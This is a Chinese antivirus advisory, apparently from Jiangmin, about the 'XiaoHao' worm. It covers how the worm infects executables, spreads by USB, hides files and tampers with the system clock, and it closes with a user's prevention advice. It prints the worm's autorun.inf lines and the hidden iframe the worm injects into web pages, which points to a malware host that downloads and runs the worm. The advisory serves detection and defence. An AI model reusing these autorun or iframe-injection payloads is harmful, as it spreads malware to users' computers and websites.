8月14日,江民科技反病毒中心监测到,一种名为“小浩”蠕虫病毒出现在网络上,该病毒和“熊猫烧香”蠕虫病毒类似,可以感染*.exe可执行程序,可以通过U盘传播,还会感染各种网页脚本程序,插入带毒网址,但是与“熊猫烧香”蠕虫病毒不同的是,被感染后的*.exe文件将遭到破坏且无法恢复!
江民反病毒专家分析该病毒详细技术特征如下:
病毒名称:Worm/XiaoHao.a
中 文 名:小浩蠕虫
病毒类型:蠕虫
危害等级:★★★★
影响平台:Win 9X/ME/NT/2000/XP/2003
病毒运行特征:
Worm/XiaoHao.a 蠕虫采用Visual C++6.0 工具编写,并经过UPX工具加壳处理,病毒运行后,会在每个硬盘根目录下释放病毒文件:
c:\xiaohao.exe, 402706字节
c:\autorun.inf, 91字节
其中xiaohao.exe 文件为病毒主体,该文件运行后搜索全盘扩展名为*.exe的文件,将自身病毒体写入到正常文件中,从而使原文件成为新的病毒体,被感染后的文件图标为一个表示有“浩”字的图标,当浏览含有被感染病毒文件的窗口时,窗口的标题栏会有已中毒 X14o-H4o's Virus 的字样。
如下图:
和“熊猫烧香”不同,这个病毒是VC写的(熊猫烧香是Delphi写的)。但它们有一个非常恼人的共同点,就是公开源代码,估计可能会在短时间内出现一大票的变种,什么“大浩、中浩”一并出现,再加上“映像劫持”“API HOOK”,那时就更难对付
由于该病毒采用的是覆盖式写入,因此被感染后的文件无法恢复。
该病毒进程还会创建iexplore.exe 子进程,利用多个系统漏洞下载木马病毒。
另外,病毒还在各个硬盘跟目录下释放的autorun.inf 文件是病毒主体的伴生文件,该文件内容如下:
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe
这样,该病毒就可以利用Windows系统的自动播放功能借助与U盘来传播,当用户在不知情的情况下,双击已感染该病毒的U盘时,就会将病毒传播到新的系统中。
该病毒还会搜索全盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件,向其中插入恶意网址连接<iframe src=http://xiaohao.yona.biz/***.htm width=0height=0></iframe>,该病毒网址会利用MS06-014、MS06-046、MS07-017等多个系统漏洞下载并且执行病毒文件http: //xiaohao.yona.biz/***.exe ,该文件为病毒体自身。
该病毒会将系统时间修改为2005年1月17日,使一些杀毒软件的使用授权失效,病毒还会模拟鼠标操作,企图绕过杀毒软件的主动防御功能。
该病毒会将其他未被感染的文件设置成隐藏属性,还会生成文件:c:\Jilu.txt,用以记录被感染的文件和被隐藏的文件。该病毒还会破坏注册表相关键值,使其不能显示隐藏文件,严重影响了电脑的正常使用。
据悉,该病毒作者还将病毒源代码公开在互联网中,并且还留下了自己的QQ号和博客地址,称“欢迎各位大牛. 来指导我 或者是交流” ,具有明显的技术炫耀性。
针对此病毒,江民科技已经紧急升级了病毒库,只要升级到8月14日的病毒库,即可拦截此病毒的入侵。
--------------------------------------------------------------------------------------------------------------------------
注意:这个病毒只能防,中毒后只能格盘重装系统和所有其他软件。因为杀软只能对其采用“删除文件”的操作
防范是重点,如果这个病毒像“熊猫烧香”一样一天内就有甚至几十个的变种出现,单靠现在的杀毒软件的特征码查杀是不行的(杀软更新速度可没有病毒快),所以请充分利用好你们的主动防御功能。
这是KV2008主动防御拦截这个病毒的提示框(KV2007的应该也可以防御)
